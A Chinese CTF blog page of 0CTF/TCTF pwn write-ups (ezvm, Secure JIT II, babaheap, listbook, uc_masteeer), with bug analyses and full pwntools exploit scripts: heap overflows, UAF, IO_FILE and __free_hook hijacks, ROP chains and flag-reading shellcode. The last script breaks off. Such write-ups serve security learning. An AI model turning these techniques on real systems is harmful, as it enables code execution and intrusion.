分类 TCTF 下的文章

题目

题目实现了一个简单的图灵完备的虚拟机,具有栈操作,算术运算,寄存器操作,读/写内存指令,跳转等指令。其中所有的算术运算都是基于栈的运算。

虚拟机的结构体大致如下:

struct VM
{
  char *code;
  __int64 *memory;
  __int64 *stack;
  __int64 code_size;
  __int64 memory_count;
  __int64 regs[4];
  __int64 vm_ip;
  __int64 vm_sp;
};

其中有三个内存段:code,memory和stack,其中code和memory的大小可以控制,stack的大小固定为0x800。寄存器的值可以通过qword常数加载。程序还提供了存/取指令用于在memory[offset]上读写,也可以通过pop/push指令在stack[vm_sp]上读写。所有的读写都要以寄存器为媒介完成。

漏洞点

除了一些无关紧要的越界读,最主要的漏洞是这个:

  if ( memory_count >= 0x200000000000000LL )    
  {
    if ( !once_flag )                           
      die("bye bye! bad hacker!");
    puts("OK, only one chance.");
    once_flag = 0;
  }
  memory_buf = (char *)malloc(8 * memory_count);

题目允许一次很大的memory_count输入,由于内存单元按照8字节大小计算,最后malloc的时候会传入8 * memory_count,所以当传入的memory_count大于0x2000000000000000时就会整数溢出。比如用户传入0x2000000000000001给memory_count,最后分配内存时相当于执行了malloc(8)

memory的读/写指令实现如下:

case 21:                                // store regX to mem[offset]
    reg_tag_3 = global_vm.code[global_vm.vm_ip];
    mem_idx = *(_QWORD *)&global_vm.code[++global_vm.vm_ip];// 偏移用8字节立即数表示
    global_vm.vm_ip += 8LL;
    if ( (unsigned __int8)reg_tag_3 > 3u || mem_idx < 0 || mem_idx >= global_vm.memory_count )
    die("oveflow!");
    global_vm.memory[mem_idx] = global_vm.regs[reg_tag_3];
    continue;
case 22:                                // load mem[offset] to regX
    reg_tag_4 = global_vm.code[global_vm.vm_ip];
    mem_idx_1 = *(_QWORD *)&global_vm.code[++global_vm.vm_ip];
    global_vm.vm_ip += 8LL;
    if ( (unsigned __int8)reg_tag_4 > 3u || mem_idx_1 < 0 || mem_idx_1 >= 8 * global_vm.memory_count / 8 )
    die("oveflow!");
    global_vm.regs[reg_tag_4] = global_vm.memory[mem_idx_1];
    continue;

可以发现,在写memory的时候使用global_vm.memory_count来作为边界条件,而在读memory的时候则使用了8 * global_vm.memory_count / 8作为边界条件,前者在整数溢出时可以发生越界写,而后者即使发生了整数溢出也无法越界读。这个性质对地址泄露的方式有些许影响。

利用思路

最开始的构造思路是,利用堆上残留有地址值的memory堆块,作为下次code使用所的堆块,将残留的地址作为常数拼接到指令中,比如|xxxxxx|op write|reg idx|leak addr|,以此完成泄露。此时如果申请的memory值特别大,以至于ptmalloc使用mmap来进行分配的话,就会得到一个与libc.so有固定偏移的内存段。之后可以使用任意偏移写来使用IO_FILE套路拿shell,但是由于指令长度受限,最后在尝试触发__malloc_assert时遇到了些困难,不得不换一种构造思路

后来发现如果用tls_dtor_list来拿shell的话...应该也是能满足的,但是做的时候忘记去考虑了

如果说不把memory构造到mmap出来的内存段上的话,那么memory与glibc之间的偏移就是随机的,意味着写memory指令中的常数值也是随机的,这无法一次性通过一个payload完成。于是需要用动态构造vm code的思路————在前一次的VM运行时完成地址泄露,并动态构地造出下一次VM运行时所需的code。然后启动一个具有整数溢出的VM,运行先前构造好的exp code,完成IO_FILE攻击。并且由于memory在heap上,可以很容易越界修改top chunk size,触发_malloc_assert->fflush->...->system("/bin/sh\x00")

由于malloc不会初始化内存,可以先通过memory构造一个残留了libc地址值的heap chunk,将残留值拷贝到不会被破坏的区域。然后释放这个chunk进入unsorted bin,将其再次以tcache的大小从这个chunk中申请两次出来,这样chunk同时包含了heap地址和glibc地址。通过heap地址和glibc地址可以计算出每次写memory[offset]时,所需的offset值。然后将这个offset值作为code的常数部分,构造到当前memory的未使用区域,并在前面添加opcode,组合成一条完整的写存指令。释放该虚拟机,memory的值不会被完全清空。最后,启动具有整数溢出的VM,通过控制code的大小,从之前释放的memory中分配内存,这样就可以执行构造好的exp code

完整Exp

from pwn import *

context.log_level = "debug"

p = process("./ezvm", env={"LD_PRELOAD":"./libc-2.35.so"})
#p = remote("202.120.7.210", 40241)

def set_code_size(size:int):
    p.recvuntil(b"Please input your code size:\n")
    p.sendline(str(size).encode())
    
def set_mem_count(count:int):
    p.recvuntil(b"Please input your memory count:\n")
    p.sendline(str(count).encode())

def send_code(code:bytes):
    p.recvuntil(b"Please input your code:\n")
    p.sendline(code)

# vm struct: 0x00555555554000+0x5040

def exp():
    # leak
    p.recvuntil(b"Welcome to 0ctf2022!!\n")
    p.sendline(b"CMD")
    set_code_size(0x1f0)
    set_mem_count(0x410//8)
    code = b""
    code += p8(23) # finish
    send_code(code)
    ## leak libc & move forward
    p.recvuntil(b"continue?\n")
    p.sendline(b"CMD")
    set_code_size(0x1f0)
    set_mem_count(0x410//8)
    code = b""
    code += p8(22) + p8(0) + p64(0) # load mem[0] to reg0
    code += p8(21) + p8(0) + p64(4) # store reg0 to mem[4]
    code += p8(23) # finish
    send_code(code)
    ## leak heap
    p.recvuntil(b"continue?\n")
    p.sendline(b"CMD")
    set_code_size(0x1f0)
    set_mem_count(0x200//8)
    code = b""
    code += p8(23) # finish
    send_code(code)   
    
    # int overflow -> heap overflow
    #gdb.attach(p, "b *0x00555555554000+0x23C9\nc\n")
    p.recvuntil(b"continue?\n")
    p.sendline(b"CMD")
    set_code_size(0x1f0)
    set_mem_count(0x200//8)
    code = b""
    ## copy libc_leak to mem[1]
    code += p8(22) + p8(2) + p64(4)     # load mem[4] to reg2
    #code += p8(21) + p8(0) + p64(1)     # store reg0 to mem[1]; store libc_leak
    ## decode ptr to mem[0]
    code += p8(22) + p8(0) + p64(0)     # load mem[0] to reg0
    code += p8(0) + p8(0)               # push reg0
    code += p8(20) + p8(1) + p64(12)    # load 12i to reg1
    code += p8(0) + p8(1)               # push reg1
    code += p8(7)                       # left shift
    #code += p8(1) + p8(0)               # pop reg0
    #code += p8(21) + p8(0) + p64(0)     # store reg0 to mem[0]; store heap_base
    ## calc next memory base
    #code += p8(0) + p8(0)               # push reg0
    code += p8(20) + p8(1) + p64(0x6b0) # load 0x6b0 to reg1
    code += p8(0) + p8(1)               # push reg1   
    code += p8(2)                       # add
    code += p8(1) + p8(0)               # pop reg0
    code += p8(21) + p8(0) + p64(2)     # store reg0 to mem[2]; store next memory_base

    ## do exploit
    ####### offsets #######
    # leak: 0x00007ffff7facce0
    pointer_guard = -0x21c570 & 0xffffffffffffffff
    stderr_vtable = 0xa98
    io_cookie_jumps_0x60 = -0x4120 & 0xffffffffffffffff
    binsh = -0x41648 & 0xffffffffffffffff
    system = -0x1c8f80 & 0xffffffffffffffff
    new_guard = 0xdeadbeef
    #######################
    # mem[4:] be used to store code
    ## calc offset to TLS
    #code += p8(22) + p8(2) + p64(1)                 # load mem[1] to reg2; libc_leak
    code += p8(0) + p8(2)                           # push reg2
    code += p8(20) + p8(0) + p64(pointer_guard)     # load pointer_guard to reg0
    code += p8(0) + p8(0)                           # push reg0
    code += p8(2)                                   # add
    code += p8(22) + p8(0) + p64(2)                 # load mem[2] to reg0; mem_base
    code += p8(0) + p8(0)                           # push reg0
    code += p8(3)                                   # sub
    code += p8(20) + p8(1) + p64(8)                 # load 8i to reg0
    code += p8(0) + p8(1)                           # push reg1  
    code += p8(5)                                   # div
    code += p8(1) + p8(0)                           # pop reg0; pointer_guard mem index
    ## construct: write pointer guard - mem[4:8]
    data = p8(20) + p8(0) + p64(new_guard)          # data: load new_guard to reg0
    data = data.ljust(0x10, b"\xff")
    code += p8(20) + p8(1) + data[:8]               # load to reg1
    code += p8(21) + p8(1) + p64(4)                 # store mem[4]
    code += p8(20) + p8(1) + data[8:]               # load to reg1
    code += p8(21) + p8(1) + p64(5)                 # store mem[5]
    code += p8(21) + p8(0) + p64(7)                 # store reg0 to mem[7]; idx
    code += p8(20) + p8(1) + b"\xff"*6+p8(21)+p8(0) # load data: store reg0 to mem[idx]
    code += p8(21) + p8(1) + p64(6)                 # store mem[6]
    
    
    ## calc offset to stderr vtable
    code += p8(0) + p8(0)                           # push reg0
    code += p8(20) + p8(1) + p64(0x43a01)           # load 0x43a01 to reg1
    code += p8(0) + p8(1)                           # push reg1
    code += p8(2)                                   # add
    code += p8(1) + p8(0)                           # pop reg0; vtable mem index
    ## construct: write stderr vtable - mem[8:10] mem[11:13]
    ### calc io_cookie_jumps+0x60 
    code += p8(20) + p8(1) + p64(io_cookie_jumps_0x60)     # load io_cookie_jumps_0x60 offset to reg1
    code += p8(0) + p8(2)                           # push reg2
    code += p8(0) + p8(1)                           # push reg1
    code += p8(2)                                   # add
    code += p8(1) + p8(1)                           # pop reg1; io_cookie_jumps_0x60
    code += p8(21) + p8(1) + p64(9)                 # store reg1 to mem[9]; idx
    code += p8(20) + p8(1) + b"\xff"*6+p8(20)+p8(0) # load data: load val to reg0
    code += p8(21) + p8(1) + p64(8)                 # store mem[8]
    code += p8(21) + p8(0) + p64(12)                # store reg0 to mem[12]; idx
    code += p8(20) + p8(1) + b"\xff"*6+p8(21)+p8(0) # load data: store reg0 to mem[idx]
    code += p8(21) + p8(1) + p64(11)                 # store mem[11]
    
    
    ## calc offset to __cookie
    code += p8(0) + p8(0)                           # push reg0
    code += p8(20) + p8(1) + p64(1)                 # load 1i to reg1
    code += p8(0) + p8(1)                           # push reg1
    code += p8(2)                                   # add
    code += p8(1) + p8(0)                           # pop reg0; __cookie mem index
    ## construct: write stderr __cookie - mem[13:17]
    ### calc binsh 
    code += p8(20) + p8(1) + p64(binsh)             # load binsh offset to reg1
    code += p8(0) + p8(2)                           # push reg2
    code += p8(0) + p8(1)                           # push reg1
    code += p8(2)                                   # add
    code += p8(1) + p8(1)                           # pop reg1; binsh
    code += p8(21) + p8(1) + p64(14)                # store reg1 to mem[14]; idx    
    code += p8(20) + p8(1) + b"\xff"*6+p8(20)+p8(0) # load data: load val to reg0
    code += p8(21) + p8(1) + p64(13)                # store mem[13]
    code += p8(21) + p8(0) + p64(16)                # store reg0 to mem[11]; idx
    code += p8(20) + p8(1) + b"\xff"*6+p8(21)+p8(0) # load data: store reg0 to mem[idx]
    code += p8(21) + p8(1) + p64(15)                # store mem[11]
    
    
    ## calc offset to stderr func_write
    code += p8(0) + p8(0)                           # push reg0
    code += p8(20) + p8(1) + p64(2)                 # load 2i to reg1
    code += p8(0) + p8(1)                           # push reg1
    code += p8(2)                                   # add
    code += p8(1) + p8(0)                           # pop reg0; func_write mem index
    ## construct: write stderr func_write - mem[17:21]
    ### calc system
    
    code += p8(20) + p8(1) + p64(system)            # load system offset to reg1
    code += p8(0) + p8(2)                           # push reg2
    code += p8(0) + p8(1)                           # push reg1
    code += p8(2)                                   # add; system_raw
    code += p8(20) + p8(1) + p64(new_guard)         # load new_guard to reg1; pointer guard
    code += p8(0) + p8(1)                           # push reg1
    code += p8(12)                                  # xor
    code += p8(20) + p8(1) + p64(0x11)              # load 0x11 to reg1;
    code += p8(0) + p8(1)                           # push reg1
    code += p8(7)                                   # ROL 
    code += p8(1) + p8(1)                           # pop reg1; system_enc
    
    code += p8(21) + p8(1) + p64(18)                # store reg1 to mem[18]; idx    
    code += p8(20) + p8(1) + b"\xff"*6+p8(20)+p8(0) # load data: load val to reg0
    code += p8(21) + p8(1) + p64(17)                # store mem[17]
    code += p8(21) + p8(0) + p64(20)                # store reg0 to mem[20]; idx
    code += p8(20) + p8(1) + b"\xff"*6+p8(21)+p8(0) # load data: store reg0 to mem[idx]
    code += p8(21) + p8(1) + p64(19)                # store mem[19]    
    
    code += p8(23)                              # finish
    send_code(code)
    
    ## run constructed code
    #gdb.attach(p, "b *0x00555555554000+0x23C9\nb *0x00007ffff7e127e0\ndir glibc-2.35/malloc\ndir glibc-2.35/libio\nc\n")
    p.recvuntil(b"continue?\n")
    p.sendline(b"CMD")
    set_code_size(0x1ff)
    set_mem_count(0x2000000000000000+0x500//8)    
    code = b""
    code += p8(20) + p8(0) + p64(0x141)         # load 0x141 to reg0
    code += p8(21) + p8(0) + p64(0x1a3)         # store reg0 to mem[0x1a3]; top size 
    code = code.ljust(0x20, b"\xff")
    #code += p8(23) # finish
    send_code(code)
    
    ## getshell
    p.recvuntil(b"continue?\n") 
    p.sendline(b"CMD")    
    set_code_size(0x10)
    set_mem_count(0x10000//8)
    p.sendline(p8(23))
    
    p.interactive()

if __name__ == "__main__":
    exp()

其它思路

Water Paddler使用了通过call_tls_dtors()来getshell的思路

CTFtime.org / 0CTF/TCTF 2022 / ezvm / Writeup

不定期更新,先贴做出来的,部分题目复现出来再更新

0x00 前言

今年依然是第三

2021-09-27T08:29:59.png

0x01 Secure JIT II

分析

一个python语言子集的的JIT,可以生成x64汇编代码,题目给出了一个相对于原工程的diff文件,通过比对发现:题目版本删除了部分代码并在末尾通过mmap开辟一个可执行段,将汇编成二进制的机器码放到里面执行并取出返回值。

需要注意的是,在mmap中执行的时候是从段起始来运行,并不是以某个函数(如main)作为入口执行——这其实会产生一些问题。然而最大的问题还是出现在调用约定的实现上,经过测试,这个编译器并没有检查传入参数和函数声明时的参数是否匹配,且取用参数是通过[rbp+x]的方式取出。这导致了如果我们传入参数的数量小于被调用函数实际声明的参数数量,就会可能发生非预期的内存读写。理论上这可以泄露并修改返回地址。

由于打远程需要发送EOF结束,所以没办法getshell后输指令拿flag,需要准备orw shellcode或者rop。最终我选择了写shellcode。但是由于立即数赋值的时候有长度限制,如果不绕过长度限制则会导致输入的shellcode不连续,增大利用难度,所以在写shellcode的时候用了一些运算来绕过限制。

最后,最关键的问题是,shellcode写到哪。实际上如果我们构造一个三层的调用栈,可以很容易通过参数越界,使得某个参数在取值时正好对应到ret地址的位置。这不仅可以让我们直接读写ret地址本身,更可以利用数组赋值的方式读写ret地址指向的内存。利用这两个写配合起来,就可顺理成章的返回到shellcode头部。

EXP

exp.p64

def test3():
    test2()

def test2():
    test()

def test(a, b, c, d, e, f, g, h, i, j):
    i = i - 9
    i = i + 0x30
    
    tmp = 0x58026a * 0x100 + 0x67
    tmp2 = tmp * 0x10000000
    tmp3 = tmp2 * 0x10
    tmp4 = 0x616c66 * 0x100 + 0x68
    tmp5 = tmp3 + tmp4
    i[0] = tmp5
    
    tmp = 0x50f99 * 0x100 + 0xf6
    tmp2 = tmp * 0x10000000
    tmp3 = tmp2 * 0x10
    tmp4 = 0x31e789 * 0x100 + 0x48
    tmp5 = tmp3 + tmp4
    i[1] = tmp5
    
    tmp = 0x89487f * 0x100 + 0xff
    tmp2 = tmp * 0x10000000
    tmp3 = tmp2 * 0x10
    tmp4 = 0xffffba * 0x100 + 0x41
    tmp5 = tmp3 + tmp4
    i[2] = tmp5
    
    tmp = 0x995f01 * 0x100 + 0x6a
    tmp2 = tmp * 0x10000000
    tmp3 = tmp2 * 0x10
    tmp4 = 0x58286a * 0x100 + 0xc6
    tmp5 = tmp3 + tmp4
    i[3] = tmp5
    
    #i[0] = 0x58026a67 616c6668
    #i[1] = 0x50f99f6 31e78948
    #i[2] = 0x89487fff ffffba41
    #i[3] = 0x995f016a 58286ac6
    
    i[4] = 0x50f
    
    return 5
    
def main():
    putc(0xa)

exp.py

from pwn import *
import time

p = remote("118.195.199.18",40404)
#p = remote("127.0.0.1",40404)
libc = ELF("./libc.so.6")

context.log_level = "debug"
context.arch = "amd64"

p.recvuntil(b"`python3 pyast64.py <xxx>`.\n")

with open("./poc2.p64", "r") as f:
    p.send(f.read())
p.shutdown('send')
    
p.interactive()

shellcode 调用的 cat flag

/* push b'flag\x00' */
push 0x67616c66
/* call open('rsp', 0, 'O_RDONLY') */
push (2) /* 2 */
pop rax
mov rdi, rsp
xor esi, esi /* 0 */
cdq /* rdx=0 */
syscall
/* call sendfile(1, 'rax', 0, 2147483647) */
mov r10d, 0x7fffffff
mov rsi, rax
push (40) /* 0x28 */
pop rax
push 1
pop rdi
cdq /* rdx=0 */
syscall

0x02 babaheap

分析

没咋做过musl的东西,后来兴起的风气。其实没啥意思,之前正好做过一些嵌入式库的分析。基本这类库的堆管理实现都类似dlmalloc。总结起来就是没hook,链表种类少,链表检查松散,基本上打好堆数据结构基础就容易推理出利用手段。

参考资料:https://juejin.cn/post/6844903574154002445#heading-4

一边学一边翻源码,思路大概如下:

  1. 程序edit功能有UAF
  2. musl初始堆位于libc的bss段,UAF给chunk的fd指针的最低位字节写0(因为输出时一定会有0截断)使其指向我们申请的别的可控堆块,然后unlink,并在可控堆块中利用view功能读出指针地址即可算出libc基址
  3. 通过unlink的方式往main_arena-8main_arena-0x10上写两个指针(需要指向合法的可写地址)以便后续通过两次unlink拿到位于main_arena位置的堆块(注意alloca会清空分配到的内存,导致arena被破坏,需要视具体情况做一些修复)
  4. 通过double unlink的方式让libc environ中保存的值被拷贝到main_arena中某个header指针的位置(相关的堆数据结构可以看看源码),然后通过上一步得到的位于main_arena的堆块读出栈地址,计算出main_ret
  5. 同样用写两个有效指针到main_ret附近
  6. 同样用双unlink取到包含main_ret的堆块,写ORW的ROP链读flag。注意此时会破坏程序栈上保存的结构体数组指针,到时无法进行后续堆操作,所以拿到这个堆块的时候就要同时写好rop链

调试过程中不算顺利,踩了很多坑,搞到凌晨6点(人困起来效率确实不高奥hhh,加上之前在0VM那题消磨了不少时间

EXP

from pwn import *

#p = process("./babaheap_patch")
p = remote("1.116.236.251", 11124)
elf = ELF("./babaheap")
libc = ELF("./ld-musl-x86_64.so.1")
context.log_level = "debug"
context.arch = "amd64"

def allocate(size:int, content):
    p.sendlineafter(b"Command: ", b"1")
    p.sendlineafter(b"Size: ", str(size).encode())
    p.sendlineafter(b"Content: ", content)
    
def update(idx:int, size:int, content):
    p.sendlineafter(b"Command: ", b"2")
    p.sendlineafter(b"Index: ", str(idx).encode())
    p.sendlineafter(b"Size: ", str(size).encode())
    p.sendlineafter(b"Content: ", content)
    
def delete(idx:int):
    p.sendlineafter(b"Command: ", b"3")
    p.sendlineafter(b"Index: ", str(idx).encode())

def view(idx:int):
    p.sendlineafter(b"Command: ", b"4")
    p.sendlineafter(b"Index: ", str(idx).encode())

# base: 0x0000555555554000
# heap: 0x00007ffff7ffe310
# tele 0x00007ffff7ffe310 100
# arena: 0x00007ffff7ffba40

def exp():
    # leak libc
    allocate(0x10, b"aaaaaaaa") #0
    allocate(0xe0, b"sep") #1 sep leak
    allocate(0x10, b"aaaaaaaa") #2
    allocate(0x10, b"sep") #3 sep
    delete(0)
    delete(2)
    update(0, 1, b"") #  modify next ptr to chunk1
    allocate(0x10, b"xxxxxxxx") #0  write ptr into chunk1
    view(1)
    p.recvuntil(b"Chunk[1]: ")
    p.recv(0xd8)
    leak = u64(p.recv(8))
    libc_base = leak - 0xb0a40
    environ = libc_base + 0xb2f38
    heap_base = libc_base + 0xb3310
    print("leak:", hex(leak))
    print("libc_base:", hex(libc_base))
    print("heap_base:", hex(heap_base))
    print("environ:", hex(environ))
    
    # leak environ
    ## write junk ptr
    allocate(0x30, b"bbbbbbbb") #2
    allocate(0x30, b"sep2") #4
    delete(2)
    #ptr1 = 0x00007ffff7ffba38-0x20
    #ptr2 = 0x00007ffff7ffba38-0x10
    ptr1 = libc_base+0xb0a38-0x20
    ptr2 = libc_base+0xb0a38-0x10
    update(2, 0x10, p64(ptr1)+p64(ptr2))
    allocate(0x30, b"xxx") #2
    ## get chunk of arena
    allocate(0x100, b"bbbbbbbb") #5
    allocate(0x50, b"sep2") #6
    delete(5)
    #gdb.attach(p)
    #pause()
    ptr1 = libc_base+0xb0a30-0x10
    ptr2 = libc_base+0xb0b00
    update(5, 0x10, p64(ptr1)+p64(ptr2)) 
    allocate(0x100, b"yyy") #5
    allocate(0x100, p64(0)*2+p64(0x9000000000)) #7 fix bitmap
    ## get leak envriron
    allocate(0x30, b"ccc") #8
    allocate(0x50, b"sep") #9
    delete(8)
    ptr1 = environ-0x10
    update(8, 0x7, p64(ptr1)[0:6]) 
    allocate(0x30, b"ccc") #8
    allocate(0x30, b"ccc") #10
    view(7)
    ## get stack addr
    p.recvuntil(b"Chunk[7]: ")
    p.recv(0x38)
    stack_leak = u64(p.recv(8))
    print("stack_leak:", hex(stack_leak))
    
    # build rop
    pop_rdi_ret = libc_base + 0x15291
    pop_rsi_ret = libc_base + 0x1d829
    pop_rdx_ret = libc_base + 0x2cdda
    libc_open = libc_base + 0x1f920
    libc_read = libc_base + 0x72d10
    libc_write = libc_base + 0x73450
    main_ret = stack_leak - 0x40
    
    ## modify chain header
    ## write junk ptr
    allocate(0x50, b"dddddddd") #11
    allocate(0xf0, b"1") #12
    allocate(0x100, b"sep2") #13
    delete(11)
    ptr1 = main_ret-0x28
    ptr2 = main_ret-0x18
    update(11, 0x10, p64(ptr1)+p64(ptr2))
    allocate(0x50, b"xxx") #11
    
    ## rop chain
    rop = p64(pop_rdi_ret) + p64(0)
    rop += p64(pop_rsi_ret) + p64(heap_base)
    rop += p64(pop_rdx_ret) + p64(8)
    rop += p64(libc_read)
    rop += p64(pop_rdi_ret) + p64(heap_base)
    rop += p64(pop_rsi_ret) + p64(0)
    rop += p64(libc_open)
    rop += p64(pop_rdi_ret) + p64(3)
    rop += p64(pop_rsi_ret) + p64(heap_base)
    rop += p64(pop_rdx_ret) + p64(30)
    rop += p64(libc_read)
    rop += p64(pop_rdi_ret) + p64(1)
    rop += p64(pop_rsi_ret) + p64(heap_base)
    rop += p64(pop_rdx_ret) + p64(30)
    rop += p64(libc_write)
    
    ## get ret chunk
    delete(12)
    ptr1 = main_ret-0x20
    ptr2 = libc_base+0xb0ae8
    update(12, 0x10, p64(ptr1)+p64(ptr2)) 
    allocate(0xf0, b"yyy") #12
    allocate(0xf0, rop) #13
    print("stack_leak:", hex(stack_leak))
    print("main_ret:", hex(main_ret))
    
    #gdb.attach(p, "b *0x0000555555554000+0x1ae2\nc\n")
    
    p.sendline(b"5")
    p.sendline(b"./flag\x00\x00")
    
    p.interactive()

if __name__ == "__main__":
    exp()

TCTF题目质量一如既往很高,而且uc(unicorn)系列挺好玩hhh 高校榜 ![TCTF_quals_2021.png][1]

Pwn

listbook

比较有意思而且不算难的堆利用

题目实现了简易的哈希表,同哈希idx的用单链表连接。

哈希值计算的时候abs8()使用不当,传值为0x80的时候返回idx为负数,下标溢出到vaild_list,造成idx0的enable位非0,造成严重的UAF

剩下就是慢慢地堆风水...

EXP:

from pwn import *

#p = process(["./listbook", "./libc-2.31.so"])
p = remote("111.186.58.249", 20001)
elf = ELF("./listbook")
libc = ELF("./libc-2.31.so")

context.log_level = "debug"

#base: 0x0000555555554000
#booklist: 0x0000555555554000+0x4840
#valid_list: 0x0000555555554000+0x4440

def add(name, content):
    p.sendlineafter(b">>", b"1")
    p.sendlineafter(b"name>", name)
    p.sendafter(b"content>", content)

def delete(idx:int):
    p.sendlineafter(b">>", b"2")   
    p.sendlineafter(b"index>", str(idx).encode())    

def show(idx:int):
    p.sendlineafter(b">>", b"3")
    p.sendlineafter(b"index>", str(idx).encode())   

def exp():
    # leak libc
    for i in range(7):
        add(b"\x01", b"AAAAAAAA\n") # fill tcache
    add(b"\x00", b"BBBBBBBB\n") # vuln: leak
    add(b"\x02", b"BBBBBBBB\n") # vuln: help
    for i in range(5):
        add(b"\x09\x01", b"KEEP\n") # keep
    for i in range(8):
        add(b"\x0b", b"KEEP\n") # keep
    add(b"\x0c", b"KEEP\n") # keep
    for i in range(2):
        add(b"\x0d", b"KEEP\n") # keep
    for i in range(7):
        add(b"\x0e", b"KEEP\n") # keep
    add(b"\x0f", b"CCCCCCCC\n") # split
    delete(1) # fill tcache
    delete(2) # break help chunk
    delete(0) # leak this Books' content

    add(b"\x80", b"AAAAAAAA\n") # enable idx:0
    show(0)
    p.recvuntil(b"=> ")
    libc_leak = u64(p.recvuntil(b"\n", drop=True).ljust(8, b"\x00"))
    libc_base = libc_leak - 608 - 0x10 - libc.symbols[b"__malloc_hook"]
    free_hook = libc_base + libc.symbols[b"__free_hook"]
    system = libc_base + libc.symbols[b"system"]
    print("libc_leak:", hex(libc_leak))
    print("libc_base:", hex(libc_base))
    print("free_hook:", hex(free_hook))
    print("system:", hex(system))

    # attack __free_hook
    ## fix small bin
    for i in range(7):
        add(b"\x03", b"FIX SMALL; CLEAN UNSORTED\n")
    delete(0)
    for i in range(3):
        add(b"\x03", b"CLEAN UNSORTED\n")
    delete(0xb)
    for i in range(7):
        add(b"\x03", b"CLEAN UNSORTED\n")
    add(b"\x04", b"UNSORTED IDX:4\n")
    add(b"\x00", b"UNSORTED IDX:0\n")
    add(b"\x05", b"UNSORTED IDX:5\n")
    add(b"\x06", b"UNSORTED SPLIT\n")
    delete(0xe)
    delete(4)
    delete(0)
    delete(5)
    for i in range(7):
        add(b"\x03", b"CLEAN TCACHE\n")
    add(b"\x06", b"OVERLAP\n")
    add(b"\x80", b"AAAAAAAA\n") # enable idx:0
    delete(0xa)
    delete(0)
    delete(6)
    # build fake chain
    add(b"\x07", b"X"*0x88+p64(210)+p64(free_hook)+b"\n")
    add(b"\x08", b"/bin/sh\n")
    add(b"\x09", p64(system)+b"\n")
    print("free_hook:", hex(free_hook))
    delete(8)

    p.interactive()

if __name__ == "__main__":
    exp()

uc_masteeer

capstone反汇编了一下:

disasm_main.txt

0x1000: sub     rsp, 0x20
0x1004: mov     word ptr [rsp + 0xe], 0
0x100b: lea     rbx, [rsp + 0xe]
0x1010: mov     qword ptr [rsp + 0x10], 0
0x1019: mov     qword ptr [rsp + 0x18], 0
0x1022: mov     ecx, 0x44
0x1027: lea     rdx, [rip + 0x18b]
0x102e: mov     esi, 1
0x1033: xor     eax, eax
0x1035: mov     edi, 1
0x103a: call    0x11fd
0x103f: mov     ecx, 2
0x1044: mov     rdx, rbx
0x1047: xor     esi, esi
0x1049: xor     edi, edi
0x104b: xor     eax, eax
0x104d: call    0x11fd
0x1052: mov     al, byte ptr [rsp + 0xe]
0x1056: cmp     al, 0x32
0x1058: je      0x1093
0x105a: cmp     al, 0x33
0x105c: je      0x10c0
0x105e: cmp     al, 0x31
0x1060: jne     0x116a
0x1066: mov     ecx, 0x12
0x106b: lea     rdx, [rip + 0x135]
0x1072: mov     esi, 1
0x1077: xor     eax, eax
0x1079: mov     edi, 1
0x107e: call    0x11fd
0x1083: add     rsp, 0x20
0x1087: movabs  rdi, 0xbabecafe000
0x1091: jmp     qword ptr [rdi]
0x1093: mov     ecx, 0x12
0x1098: lea     rdx, [rip + 0xf6]
0x109f: mov     esi, 1
0x10a4: xor     eax, eax
0x10a6: mov     edi, 1
0x10ab: call    0x11fd
0x10b0: add     rsp, 0x20
0x10b4: movabs  rdi, 0xbabecafe000
0x10be: jmp     qword ptr [rdi]
0x10c0: mov     ecx, 7
0x10c5: lea     rdx, [rip + 0xc2]
0x10cc: mov     esi, 1
0x10d1: xor     eax, eax
0x10d3: mov     edi, 1
0x10d8: call    0x11fd
0x10dd: xor     esi, esi
0x10df: xor     edi, edi
0x10e1: lea     rdx, [rsp + 0x10]
0x10e6: mov     ecx, 8
0x10eb: xor     eax, eax
0x10ed: call    0x11fd
0x10f2: mov     ecx, 7
0x10f7: mov     esi, 1
0x10fc: xor     eax, eax
0x10fe: lea     rdx, [rip + 0x82]
0x1105: mov     edi, 1
0x110a: call    0x11fd
0x110f: xor     esi, esi
0x1111: xor     edi, edi
0x1113: xor     eax, eax
0x1115: lea     rdx, [rsp + 0x18]
0x111a: mov     ecx, 8
0x111f: call    0x11fd
0x1124: cmp     qword ptr [rsp + 0x18], 0xff
0x112d: ja      0x1022
0x1133: mov     ecx, 7
0x1138: lea     rdx, [rip + 0x41]
0x113f: mov     esi, 1
0x1144: xor     eax, eax
0x1146: mov     edi, 1
0x114b: call    0x11fd
0x1150: mov     rcx, qword ptr [rsp + 0x18]
0x1155: xor     esi, esi
0x1157: xor     edi, edi
0x1159: mov     rdx, qword ptr [rsp + 0x10]
0x115e: xor     eax, eax
0x1160: call    0x11fd
0x1165: jmp     0x1022
0x116a: mov     esi, 0xff
0x116f: mov     edi, 0x3c
0x1174: xor     eax, eax
0x1176: call    0x11fd
0x117b: jmp     0x1022

disasm_tail.txt

0x1000: xor     eax, eax
0x1002: mov     ecx, 0x32
0x1007: lea     rdx, [rip + 0x55]
0x100e: mov     esi, 1
0x1013: mov     edi, 1
0x1018: sub     rsp, 0x18
0x101c: mov     word ptr [rsp + 0xe], ax
0x1021: xor     eax, eax
0x1023: call    0x1095
0x1028: xor     esi, esi
0x102a: xor     edi, edi
0x102c: xor     eax, eax
0x102e: lea     rdx, [rsp + 0xe]
0x1033: mov     ecx, 2
0x1038: call    0x1095
0x103d: cmp     byte ptr [rsp + 0xe], 0x79
0x1042: jne     0x1055
0x1044: add     rsp, 0x18
0x1048: movabs  rdi, 0xbabecafe000
0x1052: jmp     qword ptr [rdi + 0x10]
0x1055: xor     esi, esi
0x1057: mov     edi, 0x3c
0x105c: xor     eax, eax
0x105e: call    0x1095
0x1063: outsd   dx, dword ptr [rsi]
0x1065: outsb   dx, byte ptr [rsi]
0x1066: jb      0x10ca
0x1069: je      0x10e0
0x106b: insb    byte ptr [rdi], dx

disasm_admin.txt

0x1000: mov     ecx, 0x10
0x1005: lea     rdx, [rip + 0x37]
0x100c: xor     eax, eax
0x100e: mov     esi, 1
0x1013: mov     edi, 1
0x1018: sub     rsp, 8
0x101c: call    0x1080
0x1021: lea     rax, [rip + 0x2b]
0x1028: movabs  qword ptr [0xbabecafe233], rax
0x1032: add     rsp, 8
0x1036: movabs  rdi, 0xbabecafe000
0x1040: jmp     qword ptr [rdi + 8]
0x1043: insd    dword ptr [rdi], dx

可以发现跳转表没做保护

  1. 修改跳转表中跳到ADMIN的表项,拿到admin权限后跳回菜单

  2. 再恢复表项,同时把CODE部分残留的ADMIN shellcode中,命令参数给改成k33nlab/readflag\x00

  3. user_test拿flag

from pwn import *

#p = process(["python3", "./uc_masteeer.py"])
p = remote("111.186.59.29", 10087)
